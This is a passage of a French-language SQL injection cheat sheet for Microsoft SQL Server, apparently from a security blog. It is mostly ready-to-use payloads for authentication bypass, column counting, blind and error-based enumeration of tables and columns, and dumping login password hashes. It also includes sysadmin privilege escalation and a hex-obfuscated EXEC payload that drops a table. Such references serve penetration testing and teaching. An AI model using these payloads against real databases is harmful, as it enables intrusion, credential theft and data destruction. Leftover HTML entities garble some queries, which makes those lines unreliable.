\n| ;%00<\/td>\n | Nullbyte,fin de cha\u00eene<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Exemples :<\/strong><\/p>\n[sql]
\nSELECT * FROM Table WHERE username = ” OR 1=1\u00a0–‘ AND password = ”;
\nSELECT * FROM Table\u00a0WHERE data = ” UNION SELECT 1, 2, 3\/*’;
\n[\/sql]<\/p>\n Test de version MSSQL<\/h2>\n\n- @@VERSION<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[sql]SELECT * FROM Tables WHERE data = ‘1’ AND @@VERSION LIKE ‘%2008%’; — true if MSSQL 2008[\/sql]Remarques :<\/strong><\/p>\n\n- La cha\u00eene de caract\u00e8re retourn\u00e9e par @@VERSION contient \u00e9galement la version du syst\u00e8me d’exploitation Windows en place, elle est insensible \u00e0 la casse.<\/li>\n<\/ul>\n
Cr\u00e9dentiels de la base de donn\u00e9es<\/h2>\n\n- Database..Table : master..syslogins, master..sysprocesses<\/li>\n
- Colonnes : name, loginame<\/li>\n
- Utilisateur courant : user, system_user, user_name(), suser_sname(), is_srvrolemember(‘sysadmin’)<\/li>\n<\/ul>\n
Cr\u00e9dentiels de la base :<\/p>\n [sql]SELECT user, password FROM master.dbo.sysxlogins
\nSELECT name, password, LOGINPROPERTY(name, ‘PasswordHash’ ) hash FROM syslogins WHERE password IS NOT NULL; — Test on SQL Server 2012[\/sql]Exemples :<\/strong><\/p>\n[sql]
\nSELECT loginame FROM master..sysprocesses WHERE spid=@@SPID; — retourne l’utilisateur courant
\nSELECT (CASE WHEN (IS_SRVROLEMEMBER(‘sysadmin’)=1) THEN ‘1’ ELSE ‘0’ END); — v\u00e9rifie que l’utilisateur est administrateur[\/sql]<\/p>\n Gestion des utilisateurs<\/h2>\nChacune de ces requ\u00eates de gestion des utilisateurs n\u00e9cessite des droits.<\/p>\n Cr\u00e9ation d’un nouvel utilisateur<\/h3>\n[sql]EXEC sp_addlogin ‘user’, ‘passwd’;[\/sql]<\/p>\n Suppression d’un utilisateur<\/h3>\n[sql]EXEC sp_droplogin ‘user’;[\/sql]<\/p>\n Escalade de privil\u00e8ge d’un utilisateur<\/h3>\n[sql]EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin’;[\/sql]<\/p>\n Noms des bases de donn\u00e9es<\/h2>\n\n- Database.Tables : master..sysdatabases<\/li>\n
- Colonnes : name<\/li>\n
- Base de donn\u00e9es courante : DB_NAME()<\/li>\n
- Autres bases : DB_NAME(i)<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[sql]<\/p>\n SELECT DB_NAME(2);
\nSELECT name FROM master..sysdatabases;[\/sql]<\/p>\n Nom d’h\u00f4te du serveur<\/h2>\n\n- @@SERVERNAME<\/li>\n
- SERVERPROPERTY()<\/li>\n
- HOST_NAME()<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[sql]SELECT SERVERPROPERTY(‘productversion’), SERVERPROPERTY(‘productlevel’), SERVERPROPERTY(‘edition’);[\/sql]Remarques :<\/strong><\/p>\n\n- SERVERPROPERTY() est disponible depuis MSSQL 2005.<\/li>\n<\/ul>\n
Tables et colonnes<\/h2>\nD\u00e9terminer le nombre de colonnes<\/h3>\nVia “order by”<\/h4>\n\n- ORDER BY N+1;<\/li>\n<\/ul>\n
Remarques :<\/strong><\/p>\n\n- Continuer d’incr\u00e9menter la valeur de N jusqu’\u00e0 ce que la r\u00e9ponse soit false (une erreur).<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\nPour la requ\u00eate suivante :<\/p>\n [sql]SELECT * FROM Table WHERE data = ‘[INJ]’;[\/sql]<\/p>\n \n\n\n| 1′ ORDER BY 1–<\/td>\n | True<\/td>\n<\/tr>\n | \n| 1′ ORDER BY 2–<\/td>\n | True<\/td>\n<\/tr>\n | \n| 1′ ORDER BY 3–<\/td>\n | True<\/td>\n<\/tr>\n | \n| 1′ ORDER BY 4–<\/td>\n | False – La requ\u00eate ne dispose que de 3 colonnes<\/td>\n<\/tr>\n | \n| -1′ UNION SELECT 1,2,3–<\/td>\n | True<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nVia les erreurs<\/h4>\n\n- GROUP BY \/ HAVING<\/li>\n<\/ul>\n
Remarques :<\/strong><\/p>\n\n- Il n’y a plus d’erreur de retourn\u00e9e lorsque toutes les colonnes ont \u00e9t\u00e9 incluses.<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\nPour la requ\u00eate suivante :<\/p>\n [sql]SELECT * FROM Table WHERE data = ‘[INJ]’;[\/sql]<\/p>\n \n\n\n| 1′ HAVING 1=1–<\/td>\n | Column ‘Table.myColumn1’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.<\/td>\n<\/tr>\n | \n| 1′ GROUP BY myColumn1 HAVING 1=1–<\/td>\n | Column ‘Table.myColumn2’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.<\/td>\n<\/tr>\n | \n| 1′ GROUP BY myColumn1, myColumn2 HAVING 1=1–<\/td>\n | Column ‘Table.myColumn3’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.<\/td>\n<\/tr>\n | \n| 1′ GROUP BY myColumn1, myColumn2, myColumn3 HAVING 1=1–<\/td>\n | Aucune erreur<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nR\u00e9cup\u00e9rer le nom des tables<\/h3>\nLes noms des tables peuvent \u00eatre extraits via information_schema.tables ou master..sysobjects.<\/p>\n Via “Union”<\/h4>\n[sql]UNION SELECT name FROM master..sysobjects WHERE xtype=’U'[\/sql]Remarques :<\/strong><\/p>\n\n- Xtype=’U’ correspond aux tables d\u00e9finies par l’utilisateur. ‘V’ pour les vues.<\/li>\n<\/ul>\n
En mode aveugle “Blind”<\/h4>\n[sql]AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt; ‘A'[\/sql]Remarques :<\/strong><\/p>\n\n- Appliquer un algorithme dichotomique sur la requ\u00eate pour optimiser le temps de recherche et le trafic r\u00e9seau (O(log n)).<\/li>\n<\/ul>\n
Via les erreurs<\/h4>\n[sql]AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)
\nAND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))[\/sql]<\/p>\n R\u00e9cup\u00e9rer le nom des colonnes<\/h3>\nLes noms des tables peuvent \u00eatre extraits via information_schema.columns ou master..syscolumns.<\/p>\n Via “Union”<\/h4>\n[sql]UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = ‘tablename’)[\/sql]<\/p>\n En mode aveugle “Blind”<\/h4>\n[sql]AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt; ‘A'[\/sql]Remarques :<\/strong><\/p>\n\n- Appliquer un algorithme dichotomique pour optimiser les requ\u00eates, le temps de recherche et le trafic r\u00e9seau (O(log n)).<\/li>\n<\/ul>\n
Via les erreurs<\/h4>\n[sql]AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns)
\nAND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))[\/sql]<\/p>\n R\u00e9cup\u00e9rer plusieurs tables\/colonnes en une fois<\/h3>\nTechnique n\u00b01<\/h4>\nLes trois requ\u00eates suivantes permettent la cr\u00e9ation temporaire d’une table\/colonne, l’insertion de toutes les tables d\u00e9finies par l’utilisateur, la r\u00e9cup\u00e9ration de ce contenu puis la suppression de la table temporaire.<\/p>\n [sql]AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=’:’ SELECT @xy=@xy+’ ‘+name FROM sysobjects WHERE xtype=’U’ AND name&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;@xy SELECT @xy AS xy INTO TMP_DB END; — cr\u00e9ation et insertion des donn\u00e9es
\nAND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB); — r\u00e9cup\u00e9ration du contenu
\nAND 1=0; DROP TABLE TMP_DB; — suppression de la table temporaire
\n[\/sql]<\/p>\n Technique n\u00b02<\/h4>\nUne m\u00e9thode plus simple est disponible depuis MSSQL 2005 au travers de la m\u00e9thode path() XML qui effectue des concat\u00e9nations.<\/p>\n [sql]SELECT table_name as t FROM information_schema.tables FOR XML PATH(”)[\/sql]Remarques :<\/strong><\/p>\n\n- La requ\u00eate peut \u00eatre obscurcie avec un encodage :<\/span><\/li>\n<\/ul>\n
[sql]’ AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);–[\/sql]<\/p>\n R\u00e9cup\u00e9rer le type des colonnes<\/h3>\nVia des fonctions MSSQL :<\/strong><\/h4>\nLors de l’utilisation d’UNION, pour conna\u00eetre le type de telle ou telle colonne, il est possible d’appliquer sur la s\u00e9lection une fonction prenant un type pr\u00e9cis en param\u00e8tre. Dans l’exemple suivant, la fonction SUM() est utilis\u00e9e, celle-ci ne peut prendre qu’un nombre en entr\u00e9e. Si aucune erreur ne s’affiche, la colonne est de type num\u00e9rique, sinon, l’erreur indique son type :<\/p>\n [sql]’ union select sum(myColumn) from myTable–[\/sql]R\u00e9sultats en cas d’erreur :<\/strong><\/p>\nMicrosoft OLE DB Provider for ODBC Drivers error ‘80050e07’
\n [Microsoft][ODBC SQL Server Driver]<\/p>\n [SQL Server]The sum or average aggregate operation cannot take a varchar<\/strong> data type as an argument.\n<\/p><\/blockquote>\nIl est \u00e9galement possible d’exploiter les fonctions CAST() ou CONVERT().<\/p>\n M\u00e9thode incr\u00e9mentale<\/h4>\nAu travers d’un UNION, le test du type des colonnes peut se faire de la sortes :<\/p>\n
| | |
![\"Format](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/money_format_mssql.gif\")
<\/a>